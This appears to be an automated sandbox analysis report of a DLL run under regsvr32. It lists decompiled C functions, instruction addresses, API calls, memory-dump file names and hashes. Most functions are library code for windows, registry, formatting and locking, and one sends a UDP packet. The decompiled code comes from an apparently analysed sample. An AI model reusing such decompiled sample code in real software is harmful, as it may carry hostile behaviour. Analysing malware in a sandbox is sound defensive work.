				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10017C60(_t51);
			}

0x1000adb5
0x1000adb5
0x1000adb5
0x1000adb5
0x1000adbc
0x1000adc1
0x1000adc3
0x1000adc6
0x1000adcd
0x1000add0
0x1000add3
0x1000add9
0x1000ade9
0x1000addb
0x1000adde
0x1000ade3
0x1000ade4
0x1000ade4
0x1000adf1
0x1000adf3
0x1000adf5
0x1000adf7
0x1000adf7
0x1000adf7
0x1000adfc
0x1000adfc
0x1000adff
0x1000ae06
0x00000000
0x00000000
0x1000ae08
0x1000ae11
0x1000ae1a
0x1000ae1d
0x1000ae20
0x1000ae23
0x1000ae26
0x1000ae29
0x1000ae2c
0x1000ae2f
0x1000ae32
0x1000ae38
0x1000ae3b
0x1000ae42
0x1000ae49
0x1000ae4c
0x1000ae52
0x1000ae58
0x1000ae5e
0x1000ae61
0x1000ae64
0x1000ae6a
0x1000ae70
0x1000ae73
0x1000ae76
0x1000ae87

APIs

__EH_prolog3.LIBCMT ref: 1000ADBC

Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869

__strdup.LIBCMT ref: 1000ADDE
GetCurrentThread.KERNEL32 ref: 1000AE0B
GetCurrentThreadId.KERNEL32 ref: 1000AE14

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1001170E, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001170E(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10010DEC(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10057298;
					E10017C83( &_v20, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
					_t29 = E10013965(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000CF71(_t29);
					}
					return E10017C60(_t24);
				}
			}

0x1001170e
0x1001170e
0x10011710
0x1001171d
0x1001171f
0x10011721
0x10011723
0x10011723
0x10011729
0x10011738
0x10011745
0x1001174a
0x10011751
0x10011755
0x10011763
0x10011770
0x10011775
0x1001177d
0x10011784
0x10011784
0x10011789
0x10011757
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123

APIs

SendMessageA.USER32 ref: 10011738
SendMessageA.USER32 ref: 10011763

Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458

GetCapture.USER32 ref: 10011775
SendMessageA.USER32 ref: 10011784

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660

Uniqueness

Uniqueness Score: -1.00%

Function 10013F17, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10057a08; // 0x3643b451
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10016DF0( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10013ED1(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x10013f17
0x10013f1d
0x10013f24
0x10013f28
0x10013f2c
0x10013f33
0x10013f36
0x10013f76
0x10013f87
0x10013f38
0x10013f3e
0x10013f42
0x10013f50
0x10013f57
0x10013f59
0x10013f63
0x10013f63
0x10013f42
0x10013f9b

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
RegCloseKey.ADVAPI32(00000000), ref: 10013F59
_swprintf.LIBCMT ref: 10013F76
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000B244, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

0x1000b244
0x1000b246
0x1000b248
0x1000b24f
0x1000b284
0x1000b287
0x1000b25e
0x1000b25e
0x1000b263
0x1000b269
0x1000b27c
0x1000b2c7
0x1000b2c7
0x00000000
0x1000b2c7
0x1000b289
0x1000b28d
0x1000b28f
0x1000b290
0x1000b293
0x1000b299
0x1000b29c
0x1000b2b4
0x1000b2b4
0x1000b2ba
0x1000b2c2
0x00000000
0x1000b2c2
0x1000b254
0x1000b256
0x1000b259
0x1000b25c
0x00000000
0x00000000
0x00000000
0x1000b25c
0x1000b2d0

APIs

EnableMenuItem.USER32 ref: 1000B27C

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetFocus.USER32 ref: 1000B293
GetParent.USER32(?), ref: 1000B2A1
SendMessageA.USER32 ref: 1000B2B4

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001044A, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1001016F(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x1001044a
0x1001044a
0x10010452
0x10010458
0x100104bb
0x100104bb
0x100104bf
0x00000000
0x00000000
0x1001045c
0x10010460
0x1001048a
0x10010462
0x10010463
0x10010468
0x1001046a
0x1001046c
0x1001046f
0x10010472
0x10010475
0x10010478
0x10010479
0x10010479
0x1001046a
0x10010490
0x10010494
0x10010497
0x10010499
0x1001049b
0x100104ad
0x100104ad
0x1001049b
0x100104b5
0x100104b5
0x100104c4

APIs

GetTopWindow.USER32(00000000), ref: 10010458
GetTopWindow.USER32(00000000), ref: 10010497
GetWindow.USER32(00000000,00000002), ref: 100104B5

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100223DD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x100223dd
0x100223e0
0x100223e6
0x10022459
0x00000000
0x100223ed
0x100223ed
0x100223f0
0x1002240b
0x1002240e
0x1002242e
0x10022440
0x10022410
0x10022410
0x10022413
0x00000000
0x10022415
0x10022427
0x10022427
0x10022413
0x1002245e
0x10022462
0x100223f2
0x1002240a
0x1002240a
0x100223f0

APIs

__cftof_l.LIBCMT ref: 10022401

Part of subcall function 1002222C: __fltout2.LIBCMT ref: 10022256

__cftog_l.LIBCMT ref: 10022427
__cftoe_l.LIBCMT ref: 10022459

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE47, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000FB5C(_t13, _t14, _t18);
						}
						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x1000fe47
0x1000fe47
0x1000fe52
0x1000fe58
0x1000fe5e
0x1000fe62
0x1000fe92
0x1000fe95
0x1000feb2
0x1000feb2
0x1000feb4
0x1000feb6
0x00000000
0x00000000
0x1000fea0
0x1000fea5
0x1000fea7
0x1000feac
0x00000000
0x1000feac
0x00000000
0x1000fea7
0x1000fe64
0x1000fe69
0x1000fe7b
0x1000fe7f
0x1000fe80
0x00000000
0x1000fe82
0x1000fe89
0x1000fe8e
0x1000fe90
0x00000000
0x00000000
0x1000fe6b
0x1000fe72
0x1000fe79
0x00000000
0x00000000
0x1000fe79
0x1000fe69
0x1000febb
0x1000febb

APIs

GetDlgItem.USER32 ref: 1000FE52
GetTopWindow.USER32(00000000), ref: 1000FE65

Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC

GetTopWindow.USER32(?), ref: 1000FE95

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D6BC, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1002fae0);
				E1001984C(__ebx, __edi, __esi);
				_t31 = E1001BF79(__edx, __edi, _t35);
				_t15 =  *0x1005826c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1001A549(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10058170; // 0x42a1308
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10057d48;
								if(__eflags != 0) {
									_push(_t33);
									E10016380(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10058170; // 0x42a1308
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10058170; // 0x42a1308
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1001D757();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10017DA6(_t25, _t29, _t31, 0x20);
				}
				return E10019891(_t33);
			}

0x1001d6bc
0x1001d6bc
0x1001d6bc
0x1001d6bc
0x1001d6be
0x1001d6c3
0x1001d6cd
0x1001d6cf
0x1001d6d7
0x1001d6f8
0x1001d6fe
0x1001d702
0x1001d705
0x1001d708
0x1001d70e
0x1001d710
0x1001d712
0x1001d715
0x1001d71b
0x1001d71d
0x1001d71f
0x1001d725
0x1001d727
0x1001d728
0x1001d72d
0x1001d725
0x1001d71d
0x1001d72e
0x1001d733
0x1001d736
0x1001d73c
0x1001d740
0x1001d740
0x1001d746
0x1001d74d
0x1001d6df
0x1001d6df
0x1001d6df
0x1001d6e4
0x1001d6e8
0x1001d6ed
0x1001d6f5

APIs

Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87

__amsg_exit.LIBCMT ref: 1001D6E8
__lock.LIBCMT ref: 1001D6F8
InterlockedDecrement.KERNEL32(?), ref: 1001D715
InterlockedIncrement.KERNEL32(042A1308), ref: 1001D740

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10001360, Relevance: 6.0, APIs: 4, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				signed int _t15;
				short _t18;
				intOrPtr _t31;
				signed int _t33;

				_t15 =  *0x10057a08; // 0x3643b451
				_v8 = _t15 ^ _t33;
				_v28 = __ecx;
				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
				_v24 = 2;
				__imp__#11(_a4);
				_v20 = _t18;
				__imp__#9(_a8);
				_v22 = _t18;
				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
			}

0x10001366
0x1000136d
0x10001370
0x1000137b
0x10001383
0x1000138d
0x10001393
0x1000139b
0x100013a1
0x100013bc
0x100013cf

APIs

_memset.LIBCMT ref: 1000137B
inet_addr.WS2_32(?), ref: 1000138D
htons.WS2_32(?), ref: 1000139B
sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
